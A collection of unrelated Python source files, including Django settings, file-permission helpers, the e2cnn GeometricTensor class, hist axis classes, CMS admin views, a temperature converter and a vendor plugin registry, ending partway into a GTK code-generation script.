'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.IsAdminUser',
],
'DEFAULT_FILTER_BACKENDS': ('django_filters.rest_framework.DjangoFilterBackend',)
}
####
# CORS Settings
CORS_ORIGIN_REGEX_WHITELIST = env('CORS_ORIGIN_REGEX_WHITELIST')
# Also allow some standard dev URLs
CORS_ORIGIN_WHITELIST = env('CORS_ORIGIN_WHITELIST')
####
# Amazon Web Services/Boto Settings
# AN AWS KEY IS NOT REQUIRED FOR DEVELOPMENT
# More configurations related to S3 can be found in `storage_settings.py` but
# since your code may rely on non-S3 parts of AWS it might be useful here.
AWS_ACCESS_KEY_ID = env('AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = env('AWS_SECRET_ACCESS_KEY')
AWS_DEFAULT_REGION = env('AWS_DEFAULT_REGION')
####
# Email Server Settings
SES_CONFIGURATIONSET_NAME = env('SES_CONFIGURATIONSET_NAME')
DEFAULT_FROM_EMAIL = env('DEFAULT_FROM_EMAIL')
EMAIL_ACTIVE = env('EMAIL_ACTIVE')
####
# Email Feedback Settings
SES_FEEDBACK_TOPIC_ARN = env('SES_FEEDBACK_TOPIC_ARN')
####
# Geocod.io Key
GEOCODIO_KEY = env('GEOCODIO_KEY')
####
# HireFire Settings
HIREFIRE_TOKEN = env('HIREFIRE_TOKEN')
HIREFIRE_QUEUES = env('HIREFIRE_QUEUES')
####
# DemocracyWorks API Settings
DEMOCRACY_WORKS_API_KEY = env('DEMOCRACY_WORKS_API_KEY')
DEMOCRACY_WORKS_API_URL = env('DEMOCRACY_WORKS_API_URL')
####
# Timezone & Localization Settings
LANGUAGE_CODE = env('LANGUAGE_CODE')
TIME_ZONE = env('TIME_ZONE')
DATETIME_FORMAT = '%Y-%m-%d %H:%M'
USE_I18N = True
USE_L10N = True
USE_TZ = True
###
# Crispy Forms
CRISPY_TEMPLATE_PACK = 'bootstrap4'
####
# Test Runner Settings
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
NOSE_ARGS = [
'--with-xunit',
'--nologcapture'
]
####
# Django Debug Toolbar Settings
INTERNAL_IPS = env('DEBUG_TOOLBAR_IPS')
|
#
# Copyright 2012 Canonical Ltd.
#
# This file is sourced from lp:openstack-charm-helpers
#
# Authors:
# James Page <james.page@ubuntu.com>
# Paul Collins <paul.collins@canonical.com>
# Adam Gandelman <adamg@ubuntu.com>
#
import grp
import os
import pwd
from charmhelpers.core.hookenv import (
local_unit,
remote_unit,
log
)
def is_newer():
l_unit_no = local_unit().split('/')[1]
r_unit_no = remote_unit().split('/')[1]
return (l_unit_no > r_unit_no)
def chown(path, owner='root', group='root', recursive=False):
"""Changes owner of given path, recursively if needed"""
if os.path.exists(path):
log('Changing ownership of path %s to %s:%s' %
(path, owner, group))
uid = pwd.getpwnam(owner).pw_uid
gid = grp.getgrnam(group).gr_gid
if recursive:
for root, dirs, files in os.walk(path):
for d in dirs:
os.chown(os.path.join(root, d), uid, gid)
for f in files:
os.chown(os.path.join(root, f), uid, gid)
else:
os.chown(path, uid, gid)
else:
log('%s path does not exist' % path)
def chmod(path, perms, recursive=False):
"""Changes perms of given path, recursively if needed"""
if os.path.exists(path):
log('Changing perms of path %s ' % path)
if recursive:
for root, dirs, files in os.walk(path):
for d in dirs:
os.chmod(os.path.join(root, d), perms)
for f in files:
os.chmod(os.path.join(root, f), perms)
else:
os.chmod(path, perms)
else:
log('ERROR', '%s path does not exist' % path)
|
import torch
from torch import Tensor
from .field_type import FieldType
from typing import List, Union
import itertools
from collections.abc import Iterable
__all__ = ["GeometricTensor", "tensor_directsum"]
class GeometricTensor:
def __init__(self, tensor: Tensor, type: FieldType):
r"""
A GeometricTensor can be interpreted as a *typed* tensor.
It is wrapping a common :class:`torch.Tensor` and endows it with a (compatible) :class:`~e2cnn.nn.FieldType` as
*transformation law*.
The :class:`~e2cnn.nn.FieldType` describes the action of a group :math:`G` on the tensor.
This action includes both a transformation of the base space and a transformation of the channels according to
a :math:`G`-representation :math:`\rho`.
All *e2cnn* neural network operations have :class:`~e2cnn.nn.GeometricTensor` s as inputs and outputs.
They perform a dynamic typechecking, ensuring that the transformation laws of the data and the operation match.
See also :class:`~e2cnn.nn.EquivariantModule`.
As usual, the first dimension of the tensor is interpreted as the batch dimension. The second is the fiber
(or channel) dimension, which is associated with a group representation by the field type. The following
dimensions are the spatial dimensions (like in a conventional CNN).
The operations of **addition** and **scalar multiplication** are supported.
For example::
gs = e2cnn.gspaces.Rot2dOnR2(8)
type = e2cnn.nn.FieldType(gs, [gs.regular_repr]*3)
t1 = e2cnn.nn.GeometricTensor(torch.randn(1, 24, 3, 3), type)
t2 = e2cnn.nn.GeometricTensor(torch.randn(1, 24, 3, 3), type)
# addition
t3 = t1 + t2
# scalar product
t3 = t1 * 3.
# scalar product also supports tensors containing only one scalar
t3 = t1 * torch.tensor(3.)
# inplace operations are also supported
t1 += t2
t2 *= 3.
.. warning ::
The multiplication of a PyTorch tensor containing only a scalar with a GeometricTensor is only supported
when using PyTorch 1.4 or higher (see this `issue <https://github.com/pytorch/pytorch/issues/26333>`_ )
A GeometricTensor supports **slicing** in a similar way to PyTorch's :class:`torch.Tensor`.
More precisely, slicing along the batch (1st) and the spatial (3rd, 4th, ...) dimensions works as usual.
However, slicing the fiber (2nd) dimension would break equivariance when splitting channels belonging to
the same field.
To prevent this, slicing on the second dimension is defined over *fields* instead of channels.
.. warning ::
GeometricTensor only supports basic *slicing* but it does **not** support *advanced indexing* (see NumPy's
documentation about
`indexing <https://docs.scipy.org/doc/numpy/reference/arrays.indexing.html#basic-slicing-and-indexing>`_
for more details).
Moreover, in contrast to NumPy and PyTorch, an index containing a single integer value **does not** reduce
the dimensionality of the tensor.
In this way, the resulting tensor can always be interpreted as a GeometricTensor.
We give few examples to illustrate this behavior::
# Example of GeometricTensor slicing
space = e2cnn.gspaces.Rot2dOnR2(4)
type = e2cnn.nn.FieldType(space, [
# field type # index # size
space.regular_repr, # 0 # 4
space.regular_repr, # 1 # 4
space.irrep(1), # 2 # 2
space.irrep(1), # 3 # 2
space.trivial_repr, # 4 # 1
space.trivial_repr, # 5 # 1
space.trivial_repr, # 6 # 1
]) # sum = 15
# this FieldType contains 8 fields
len(type)
>> 7
# the size of this FieldType is equal to the sum of the sizes of each of its fields
type.size
>> 15
geom_tensor = e2cnn.nn.GeometricTensor(torch.randn(10, type.size, 9, 9), type)
geom_tensor.shape
>> torch.Size([10, 15, 9, 9])
geom_tensor[1:3, :, 2:5, 2:5].shape
>> torch.Size([2, 15, 3, 3])
geom_tensor[..., 2:5].shape
>> torch.Size([10, 15, 9, 3])
# the tensor contains the fields 1:4, i.e 1, 2 and 3
# these fields have size, respectively, 4, 2 and 2
# so the resulting tensor has 8 channels
geom_tensor[:, 1:4, ...].shape
>> torch.Size([10, 8, 9, 9])
# the tensor contains the fields 0:6:2, i.e 0, 2 and 4
# these fields have size, respectively, 4, 2 and 1
# so the resulting tensor has 7 channels
geom_tensor[:, 0:6:2].shape
>> torch.Size([10, 7, 9, 9])
# the tensor contains only the field 2, which has size 2
# note, also, that even though a single index is used for the batch dimension, the resulting tensor
# still has 4 dimensions
geom_tensor[3, 2].shape
>> torch.Size(1, 2, 9, 9)
.. warning ::
*Slicing* over the fiber (2nd) dimension with ``step > 1`` or with a negative step is converted
into *indexing* over the channels.
This means that, in these cases, slicing behaves like *advanced indexing* in PyTorch and NumPy
**returning a copy instead of a view**.
For more details, see the *note* `here <https://pytorch.org/docs/stable/tensor_view.html>`_ and
*NumPy*'s `docs <https://docs.scipy.org/doc/numpy/reference/arrays.indexing.html>`_ .
.. note ::
Slicing is not supported for setting values inside the tensor
(i.e. :meth:`~object.__setitem__` is not implemented).
Indeed, depending on the values which are assigned, this operation can break the symmetry of the tensor
which may not transform anymore according to its transformation law (specified by ``type``).
In case this feature is necessary, one can directly access the underlying :class:`torch.Tensor`, e.g.
``geom_tensor.tensor[:3, :, 2:5, 2:5] = torch.randn(3, 4, 3, 3)``, although this is not recommended.
Args:
tensor (torch.Tensor): the tensor data
type (FieldType): the type of the tensor, modeling its transformation law
Attributes:
~.tensor (torch.Tensor)
~.type (FieldType)
"""
assert isinstance(tensor, torch.Tensor)
assert isinstance(type, FieldType)
assert len(tensor.shape) >= 2
assert tensor.shape[1] == type.size, \
f"Error! The size of the tensor {tensor.shape} does not match the size of the field type {type.size}."
# torch.Tensor: PyTorch tensor containing the data
self.tensor = tensor
# FieldType: field type of the signal
self.type = type
def restrict(self, id) -> 'GeometricTensor':
r"""
Restrict the field type of this tensor.
The method returns a new :class:`~e2cnn.nn.GeometricTensor` whose :attr:`~e2cnn.nn.GeometricTensor.type`
is equal to this tensor's :attr:`~e2cnn.nn.GeometricTensor.type`
restricted to a subgroup :math:`H<G` (see :meth:`e2cnn.nn.FieldType.restrict`).
The restricted :attr:`~e2cnn.nn.GeometricTensor.type` is associated with the restricted representation
:math:`\Res{H}{G}\rho` of the :math:`G`-representation :math:`\rho` associated to this tensor's
:attr:`~e2cnn.nn.GeometricTensor.type`.
The input ``id`` specifies the subgroup :math:`H < G`.
Notice that the underlying :attr:`~e2cnn.nn.GeometricTensor.tensor` instance will be shared between
the current tensor and the returned one.
.. warning ::
The method builds the new representation on the fly; hence, if this operation is needed at run time,
we suggest to use :class:`e2cnn.nn.RestrictionModule` which pre-computes the new representation offline.
.. seealso ::
Check the documentation of the :meth:`~e2cnn.gspaces.GSpace.restrict` method in the
:class:`~e2cnn.gspaces.GSpace` instance used for a description of the parameter ``id``.
Args:
id: the id identifying the subgroup :math:`H` the representations are restricted to
Returns:
the geometric tensor with the restricted representations
"""
new_class = self.type.restrict(id)
return GeometricTensor(self.tensor, new_class)
def split(self, breaks: List[int]):
r"""
Split this tensor on the channel dimension in a list of smaller tensors.
The original tensor is split at the *fields* specified by the index list ``breaks``.
If the tensor is associated with the list of fields :math:`\{\rho_i\}_i`
(see :attr:`e2cnn.nn.FieldType.representations`), the :math:`j`-th output tensor will contain the fields
:math:`\rho_{\text{breaks}[j-1]}, \dots, \rho_{\text{breaks}[j]-1}` of the original tensor.
If `breaks = None`, the tensor is split at each field.
This is equivalent to using `breaks = list(range(len(self.type)))`.
Example ::
space = e2cnn.gspaces.Rot2dOnR2(4)
type = e2cnn.nn.FieldType(space, [
space.regular_repr, # size = 4
space.regular_repr, # size = 4
space.irrep(1), # size = 2
space.irrep(1), # size = 2
space.trivial_repr, # size = 1
space.trivial_repr, # size = 1
space.trivial_repr, # size = 1
]) # sum = 15
type.size
>> 15
geom_tensor = e2cnn.nn.GeometricTensor(torch.randn(10, type.size, 7, 7), type)
geom_tensor.shape
>> torch.Size([10, 15, 7, 7])
# split the tensor in 3 parts
len(geom_tensor.split([0, 4, 6]))
>> 3
# the first contains
# - the first 2 regular fields (2*4 = 8 channels)
# - 2 vector fields (irrep(1)) (2*2 = 4 channels)
# and, therefore, contains 12 channels
geom_tensor.split([0, 4, 6])[0].shape
>> torch.Size([10, 12, 7, 7])
# the second contains only 2 scalar (trivial) fields (2*1 = 2 channels)
geom_tensor.split([0, 4, 6])[1].shape
>> torch.Size([10, 2, 7, 7])
# the last contains only 1 scalar (trivial) field (1*1 = 1 channels)
geom_tensor.split([0, 4, 6])[2].shape
>> torch.Size([10, 1, 7, 7])
Args:
breaks (list): indices of the fields where to split the tensor
Returns:
list of :class:`~e2cnn.nn.GeometricTensor` s into which the original tensor is chunked
"""
if breaks is None:
breaks = list(range(len(self.type)))
breaks.append(len(self.type))
# final list of tensors
tensors = []
# list containing the index of the channels separating consecutive fields in this tensor
positions = []
last = 0
for repr in self.type.representations:
positions.append(last)
last += repr.size
positions.append(last)
last_field = 0
# for each break point
for b in breaks:
assert b > last_field, 'Error! "breaks" must be an increasing list of positive indexes'
# compute the sub-class of the new sub-tensor
repr = FieldType(self.type.gspace, self.type.representations[last_field: b])
# retrieve the sub-tensor
data = self.tensor[:, positions[last_field]:positions[b], ...]
tensors.append(GeometricTensor(data, repr))
last_field = b
return tensors
def transform(self, element) -> 'GeometricTensor':
r"""
Transform the current tensor according to the group representation associated to the input element
and its induced action on the base space
.. warning ::
The input tensor is detached before the transformation therefore no gradient is backpropagated
through this operation
See :meth:`e2cnn.nn.GeometricTensor.transform_fibers` to transform only the fibers, i.e. not transform
the base space.
Args:
element: an element of the group of symmetries of the fiber.
Returns:
the transformed tensor
"""
transformed = self.type.transform(self.tensor, element)
return GeometricTensor(transformed, self.type)
def transform_fibers(self, element) -> 'GeometricTensor':
r"""
Transform the feature vectors of the underlying tensor according to the group representation associated to
the input element.
Interpreting the tensor as a vector-valued signal :math:`f: X \to \mathbb{R}^c` over a base space :math:`X`
(where :math:`c` is the number of channels of the tensor), given the input ``element`` :math:`g \in G`
(:math:`G` fiber group) the method returns the new signal :math:`f'`:
.. math ::
f'(x) := \rho(g) f(x)
for :math:`x \in X` point in the base space and :math:`\rho` the representation of :math:`G` in the
field type of this tensor.
Notice that the input element has to be an element of the fiber group of this tensor's field type.
.. seealso ::
See :meth:`e2cnn.nn.GeometricTensor.transform` to transform the whole tensor.
Args:
element: an element of the group of symmetries of the fiber.
Returns:
the transformed tensor
"""
rho = torch.FloatTensor(self.type.representation(element))
data = torch.einsum("oi,bihw->bohw", (rho, self.tensor.contiguous())).contiguous()
return GeometricTensor(data, self.type)
@property
def shape(self):
r"""
Alias for ``self.tensor.shape``
"""
return self.tensor.shape
def size(self):
r"""
Alias for ``self.tensor.size()``
.. seealso ::
:meth:`torch.Tensor.size`
"""
return self.tensor.size()
def to(self, *args, **kwargs):
r"""
Alias for ``self.tensor.to(*args, **kwargs)``.
Applies :meth:`torch.Tensor.to` to the underlying tensor and wraps the resulting tensor in a new
:class:`~e2cnn.nn.GeometricTensor` with the same type.
"""
tensor = self.tensor.to(*args, **kwargs)
return GeometricTensor(tensor, self.type)
def __getitem__(self, slices) -> 'GeometricTensor':
r'''
A GeometricTensor supports *slicing* in a similar way to PyTorch's :class:`torch.Tensor`.
More precisely, slicing along the batch (1st) and the spatial (3rd, 4th, ...) dimensions works as usual.
However, slicing along the channel dimension could break equivariance by splitting the channels belonging to the
same field.
For this reason, slicing on the second dimension is not defined over the channels but over fields.
When a continuous (step=1) slice is used over the fields/channels dimension (the 2nd axis), it is converted
into a continuous slice over the channels.
This is not possible when the step is greater than 1 or negative.
In such cases, the slice over the fields needs to be converted into an index over the channels.
Moreover, when a single integer is used to index an axis, that axis is not discarded as in PyTorch but is
preserved with size 1.
Slicing is not supported for setting values inside the tensor (i.e. :meth:`object.__setitem__`
is not implemented).
'''
# Slicing is not supported on the channel dimension.
if isinstance(slices, tuple):
if len(slices) > len(self.tensor.shape):
raise TypeError(
f'''
Error! Too many slicing indices for GeometricTensor.
At most {len(self.tensor.shape)} indices expected but {len(slices)} indices passed.
'''
)
else:
slices = (slices,)
for i, idx in enumerate(slices):
if not (isinstance(idx, slice) or isinstance(idx, int) or idx == Ellipsis):
raise TypeError(f'''
Error! Advanced Indexing over a GeometricTensor is not supported yet.
Currently, only basic slicing is supported.
''')
naxes = len(self.tensor.shape)
# count the number of indexes passed
indexed_axes = 0
for idx in slices:
indexed_axes += 1 - (idx == Ellipsis)
# number of axes which are missing an index
missing_axes = naxes - indexed_axes
# expand the first ellipsis with a number of full slices (i.e. [::]) equal to the number
# of axes not indexed. Discard all other ellipses
expanded_idxs = []
expanded_ellipsis = False
for s in slices:
if s == Ellipsis:
# expand only the first ellipsis
if not expanded_ellipsis:
expanded_idxs += [slice(None)]*missing_axes
expanded_ellipsis = True
else:
# other indices are preserved
expanded_idxs.append(s)
# maximum index per dimension
idx_max = list(self.tensor.shape)
idx_max[1] = len(self.type)
# If an index containing a single integer is passed, it is converted into a slice
# which starts at that index and ends at the following one.
# In this way, when passing a single integer to index a dimension, the resulting tensor will still have that
# dimension with size 1
for i in range(len(expanded_idxs)):
if isinstance(expanded_idxs[i], int):
idx = expanded_idxs[i]
if idx < 0:
# convert a negative index into a positive index
idx = idx_max[i] + idx
expanded_idxs[i] = slice(idx, idx+1, 1)
if len(expanded_idxs) == 1:
# if only the first dimension is indexed, there is no need to do anything
# the resulting tensor will have the same type of the original as the indexing does not affect the
# channels/fields dimension
type = self.type
elif isinstance(expanded_idxs[1], slice) and (expanded_idxs[1].step is None or expanded_idxs[1].step == 1):
# If the index over the fields is a slice and it is contiguous, we can convert it into a
# contiguous slice over the channels.
# The slice will start from the first channel of the first field and will stop at the last channel
# of the last field
start = expanded_idxs[1].start if expanded_idxs[1].start is not None else 0
stop = expanded_idxs[1].stop if expanded_idxs[1].stop is not None else len(self.type)
channel_idxs = slice(
self.type.fields_start[start],
self.type.fields_end[stop-1],
1
)
if start == 0 and stop == len(self.type):
# if all the fields are retrieved by this index, the resulting tensor has the same field
# types of the original one
type = self.type
else:
# otherwise, only a subset of the fields are preserved
type = FieldType(self.type.gspace, self.type.representations[expanded_idxs[1]])
expanded_idxs[1] = channel_idxs
else:
# If the index over the fields is not a slice or it is not a contiguous slice, we need to convert it
# into an index over the channels. We first use the index provided to retrieve the list of fields
# and then add the index of their channels in a list of indexes
idxs = []
# convert the indices into iterable and retrieve the subset of field representations
if isinstance(expanded_idxs[1], slice):
fields = range(len(self.type))[expanded_idxs[1]]
representations = self.type.representations[expanded_idxs[1]]
elif isinstance(expanded_idxs[1], int):
fields = [expanded_idxs[1]]
representations = self.type.representations[expanded_idxs[1]]
elif isinstance(expanded_idxs[1], Iterable):
fields = expanded_idxs[1]
representations = [self.type.representations[f] for f in fields]
else:
raise ValueError('Index over the fiber (2nd) dimension not recognized.')
# iterate over all fields indexed by the user
for field in fields:
# append the indexes of the channels in the field
idxs.append(list(
range(
self.type.fields_start[field],
self.type.fields_end[field],
1
)
))
# only a subset of the fields are preserved by this index
type = FieldType(self.type.gspace, representations)
# concatenate all the channel indexes
channel_idxs = list(itertools.chain(*idxs))
expanded_idxs[1] = channel_idxs
idxs = tuple(expanded_idxs)
sliced_tensor = self.tensor[idxs]
return GeometricTensor(sliced_tensor, type)
def __add__(self, other: 'GeometricTensor') -> 'GeometricTensor':
r"""
Add two compatible :class:`~e2cnn.nn.GeometricTensor` using pointwise addition.
The two tensors needs to have the same shape and be associated to the same field type.
Args:
other (GeometricTensor): the other geometric tensor
Returns:
the sum
"""
assert self.type == other.type, 'The two geometric tensor must have the same FieldType'
return GeometricTensor(self.tensor + other.tensor, self.type)
def __sub__(self, other: 'GeometricTensor') -> 'GeometricTensor':
r"""
Subtract two compatible :class:`~e2cnn.nn.GeometricTensor` using pointwise subtraction.
The two tensors needs to have the same shape and be associated to the same field type.
Args:
other (GeometricTensor): the other geometric tensor
Returns:
their difference
"""
assert self.type == other.type, 'The two geometric tensor must have the same FieldType'
return GeometricTensor(self.tensor - other.tensor, self.type)
def __iadd__(self, other: 'GeometricTensor') -> 'GeometricTensor':
r"""
Add a compatible :class:`~e2cnn.nn.GeometricTensor` to this tensor inplace.
The two tensors needs to have the same shape and be associated to the same field type.
Args:
other (GeometricTensor): the other geometric tensor
Returns:
this tensor
"""
assert self.type == other.type, 'The two geometric tensor must have the same FieldType'
self.tensor += other.tensor
return self
def __isub__(self, other: 'GeometricTensor') -> 'GeometricTensor':
r"""
Subtract a compatible :class:`~e2cnn.nn.GeometricTensor` to this tensor inplace.
The two tensors needs to have the same shape and be associated to the same field type.
Args:
other (GeometricTensor): the other geometric tensor
Returns:
this tensor
"""
assert self.type == other.type, 'The two geometric tensor must have the same FieldType'
self.tensor -= other.tensor
return self
def __mul__(self, other: Union[float, torch.Tensor]) -> 'GeometricTensor':
r"""
Scalar product of this :class:`~e2cnn.nn.GeometricTensor` with a scalar.
The operation is done inplace.
The scalar can be a float number of a :class:`torch.Tensor` containing only
one scalar (i.e. :func:`torch.numel` should return `1`).
Args:
other : a scalar
Returns:
the scalar product
"""
assert isinstance(other, float) or other.numel() == 1, 'Only multiplication with a scalar is allowed'
return GeometricTensor(self.tensor * other, self.type)
__rmul__ = __mul__
def __imul__(self, other: Union[float, torch.Tensor]) -> 'GeometricTensor':
r"""
Scalar product of this :class:`~e2cnn.nn.GeometricTensor` with a scalar.
The scalar can be a float number of a :class:`torch.Tensor` containing only
one scalar (i.e. :func:`torch.numel` should return `1`).
Args:
other : a scalar
Returns:
the scalar product
"""
assert isinstance(other, float) or other.numel() == 1, 'Only multiplication with a scalar is allowed'
self.tensor *= other
return self
def __repr__(self):
t = repr(self.tensor)[:-1]
t = t.replace('\n', '\n ')
r = 'g_' + t + ', ' + repr(self.type) + ')'
return r
def tensor_directsum(tensors: List['GeometricTensor']) -> 'GeometricTensor':
r"""
Concatenate a list of :class:`~e2cnn.nn.GeometricTensor` s on the channels dimension (``dim=1``).
The input tensors have to be compatible: they need to have the same shape except for the channels
dimension (``dim=1``).
In the resulting :class:`~e2cnn.nn.GeometricTensor`, the channels dimension will be associated with the direct sum
representation of the representations of the input tensors.
.. seealso::
:func:`e2cnn.group.directsum`
Args:
tensors (list): a list of :class:`~e2cnn.nn.GeometricTensor` s
Returns:
the direct sum of the inputs
"""
# assert len(tensors) > 1
for i in range(1, len(tensors)):
assert tensors[0].type.gspace == tensors[i].type.gspace
assert tensors[0].tensor.ndimension() == tensors[i].tensor.ndimension()
assert tensors[0].tensor.shape[0] == tensors[i].tensor.shape[0]
assert tensors[0].tensor.shape[2:] == tensors[i].tensor.shape[2:]
# concatenate all representations from all field types
reprs = []
for t in tensors:
reprs += t.type.representations
# build the new field type
cls = FieldType(tensors[0].type.gspace, reprs)
# concatenate the underlying tensors
data = torch.cat([t.tensor for t in tensors], dim=1)
# build the new Geometric Tensor
return GeometricTensor(data, cls)
|
import sys
from typing import Any, Dict, Iterable, List, Optional, Tuple
import boost_histogram.axis as bha
import hist
from hist.axestuple import ArrayTuple, NamedAxesTuple
if sys.version_info >= (3, 8):
from typing import Protocol
else:
from typing_extensions import Protocol
from . import transform
__all__ = (
"AxisProtocol",
"AxesMixin",
"Regular",
"Variable",
"Integer",
"IntCategory",
"StrCategory",
"Boolean",
"transform",
"NamedAxesTuple",
"ArrayTuple",
)
def __dir__() -> Tuple[str, ...]:
return __all__
class CoreAxisProtocol(Protocol):
metadata: Dict[str, Any]
class AxisProtocol(Protocol):
metadata: Any
@property
def name(self) -> str:
...
label: str
_ax: CoreAxisProtocol
class AxesMixin:
__slots__ = ()
# Support mixing before or after a bh class
def __init_subclass__(cls, **kwargs: Any) -> None:
super().__init_subclass__(**kwargs) # type: ignore
@property
def name(self: AxisProtocol) -> str:
"""
Get or set the name for the Regular axis
"""
return self._ax.metadata.get("name", "")
@property
def label(self: AxisProtocol) -> str:
"""
Get or set the label for the Regular axis
"""
return self._ax.metadata.get("label", "") or self.name
@label.setter
def label(self: AxisProtocol, value: str) -> None:
self._ax.metadata["label"] = value
def _repr_args_(self: AxisProtocol) -> List[str]:
"""
Return options for use in repr.
"""
ret: List[str] = super()._repr_args_() # type: ignore
if self.name:
ret.append(f"name={self.name!r}")
if self.label:
ret.append(f"label={self.label!r}")
return ret
class Regular(AxesMixin, bha.Regular, family=hist):
__slots__ = ()
def __init__(
self,
bins: int,
start: float,
stop: float,
*,
name: str = "",
label: str = "",
metadata: Any = None,
flow: bool = True,
underflow: Optional[bool] = None,
overflow: Optional[bool] = None,
growth: bool = False,
circular: bool = False,
transform: Optional[bha.transform.AxisTransform] = None,
__dict__: Optional[Dict[str, Any]] = None,
) -> None:
super().__init__(
bins,
start,
stop,
metadata=metadata,
underflow=flow if underflow is None else underflow,
overflow=flow if overflow is None else overflow,
growth=growth,
circular=circular,
transform=transform,
__dict__=__dict__,
)
self._ax.metadata["name"] = name
self.label: str = label
class Boolean(AxesMixin, bha.Boolean, family=hist):
__slots__ = ()
def __init__(
self,
*,
name: str = "",
label: str = "",
metadata: Any = None,
__dict__: Optional[Dict[str, Any]] = None,
) -> None:
super().__init__(
metadata=metadata,
__dict__=__dict__,
)
self._ax.metadata["name"] = name
self.label: str = label
class Variable(bha.Variable, AxesMixin, family=hist):
__slots__ = ()
def __init__(
self,
edges: Iterable[float],
*,
name: str = "",
label: str = "",
flow: bool = True,
underflow: Optional[bool] = None,
overflow: Optional[bool] = None,
growth: bool = False,
circular: bool = False,
metadata: Any = None,
__dict__: Optional[Dict[str, Any]] = None,
) -> None:
super().__init__(
edges,
metadata=metadata,
underflow=flow if underflow is None else underflow,
overflow=flow if overflow is None else overflow,
growth=growth,
circular=circular,
__dict__=__dict__,
)
self._ax.metadata["name"] = name
self.label: str = label
class Integer(bha.Integer, AxesMixin, family=hist):
__slots__ = ()
def __init__(
self,
start: int,
stop: int,
*,
name: str = "",
label: str = "",
flow: bool = True,
underflow: Optional[bool] = None,
overflow: Optional[bool] = None,
growth: bool = False,
circular: bool = False,
metadata: Any = None,
__dict__: Optional[Dict[str, Any]] = None,
) -> None:
super().__init__(
start,
stop,
metadata=metadata,
underflow=flow if underflow is None else underflow,
overflow=flow if overflow is None else overflow,
growth=growth,
circular=circular,
__dict__=__dict__,
)
self._ax.metadata["name"] = name
self.label: str = label
class IntCategory(bha.IntCategory, AxesMixin, family=hist):
__slots__ = ()
def __init__(
self,
categories: Iterable[int],
*,
name: str = "",
label: str = "",
growth: bool = False,
metadata: Any = None,
__dict__: Optional[Dict[str, Any]] = None,
) -> None:
super().__init__(
categories,
metadata=metadata,
growth=growth,
__dict__=__dict__,
)
self._ax.metadata["name"] = name
self.label: str = label
class StrCategory(bha.StrCategory, AxesMixin, family=hist):
__slots__ = ()
def __init__(
self,
categories: Iterable[str],
*,
name: str = "",
label: str = "",
growth: bool = False,
metadata: Any = None,
__dict__: Optional[Dict[str, Any]] = None,
) -> None:
super().__init__(
categories,
metadata=metadata,
growth=growth,
__dict__=__dict__,
)
self._ax.metadata["name"] = name
self.label: str = label
|
from __future__ import absolute_import, unicode_literals
from django.utils.translation import ugettext_lazy
from tuiuiu.tuiuiuadmin.views import generic
from tuiuiu.tuiuiuadmin.viewsets.model import ModelViewSet
from tuiuiu.tuiuiucore.models import Site
from tuiuiu.tuiuiucore.permissions import site_permission_policy
from tuiuiu.tuiuiusites.forms import SiteForm
class IndexView(generic.IndexView):
template_name = 'tuiuiusites/index.html'
page_title = ugettext_lazy("Sites")
add_item_label = ugettext_lazy("Add a site")
context_object_name = 'sites'
class CreateView(generic.CreateView):
page_title = ugettext_lazy("Add site")
success_message = ugettext_lazy("Site '{0}' created.")
template_name = 'tuiuiusites/create.html'
class EditView(generic.EditView):
success_message = ugettext_lazy("Site '{0}' updated.")
error_message = ugettext_lazy("The site could not be saved due to errors.")
delete_item_label = ugettext_lazy("Delete site")
context_object_name = 'site'
template_name = 'tuiuiusites/edit.html'
class DeleteView(generic.DeleteView):
success_message = ugettext_lazy("Site '{0}' deleted.")
page_title = ugettext_lazy("Delete site")
confirmation_message = ugettext_lazy("Are you sure you want to delete this site?")
class SiteViewSet(ModelViewSet):
icon = 'site'
model = Site
permission_policy = site_permission_policy
index_view_class = IndexView
add_view_class = CreateView
edit_view_class = EditView
delete_view_class = DeleteView
def get_form_class(self, for_update=False):
return SiteForm
|
celsius = float(input('Digite a temperatura em °C: '))
f = ((9*celsius)/5)+32
print ('A temperatura de {}°C corresponde a {}F'.format(celsius,f)) |
"""
"""
import abc
from os.path import dirname
import pkgutil
import sys
__all__ = ['registry', 'Release', 'Vendor', 'VendorRegistry']
class Vendor(metaclass=abc.ABCMeta):
def __init__(self, config):
pass
@staticmethod
@abc.abstractproperty
def id():
"""Vendor IDentifier used to when stored in database"""
@abc.abstractproperty
def name(self):
"""Display name for the vendor"""
@abc.abstractmethod
def get_latest(self, device):
"""Get the latest available version for the given device"""
def supported_devices():
"""Return a list of enumerated devices, if suppported. If enumeration is not supported, should return None"""
return None
def retrieve_device_version(self, device):
"""Use the device information to retrieve the current version. If not supported, should return None"""
return None
class Release:
version = None
download_url = None
notes = None
docs_url = None
hash_type = None
hash_sum = None
release_date = None
file_size = None
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
class VendorRegistry(object):
config = None
def __init__(self):
self.vendor_classes = {}
self.vendor = None
def init_config(self, config):
self.vendors = {}
for vendor_id, klass in self.vendor_classes.items():
self.vendors[vendor_id] = klass(config)
def register(self, klass):
self.vendor_classes[klass.id()] = klass
if self.config:
self.vendors[klass.id()] = klass(self.config)
return klass
def unregister(self, name):
if name in self.vendors:
del self.vendors[name]
def get(self, name):
return self.vendors[name] if name in self.vendors else None
def keys(self):
return self.vendor_classes.keys()
def values(self):
return self.vendors.values()
def items(self):
return self.vendors.items()
def load_vendors(self):
""" Load all available vendors"""
# Load local modules
basepath = dirname(__file__)
for importer, package_name, _ in pkgutil.iter_modules([basepath]):
full_package_name = '%s.%s' % ('vendor', package_name)
if full_package_name not in sys.modules:
__import__(full_package_name)
# TODO: Test external loading of vendors
try:
from pkg_resources import iter_entry_points
except ImportError:
return
for ep in iter_entry_points(group="homenet-check.vendor"):
f = ep.load()
f()
registry = VendorRegistry()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import re
import os
import filecmp
def replace_if_changed(new, old):
'''
Compare contents and only replace if changed to avoid triggering a rebuild.
'''
try:
changed = not filecmp.cmp(new, old, shallow=False)
except FileNotFoundError:
changed = True
if changed:
os.replace(new, old)
else:
os.remove(new)
debug = os.getenv('GTK_GENTYPEFUNCS_DEBUG') is not None
out_file = sys.argv[1]
in_files = sys.argv[2:]
funcs = []
if debug: print ('Output file: ', out_file)
if debug: print (len(in_files), 'input files')
def open_file(filename, mode):
if sys.version_info[0] < 3:
return open(filename, mode=mode)
else:
return open(filename, mode=mode, encoding='utf-8')
for filename in in_files:
if debug: print ('Input file: ', filename)
with open_file(filename, "r") as f:
for line in f:
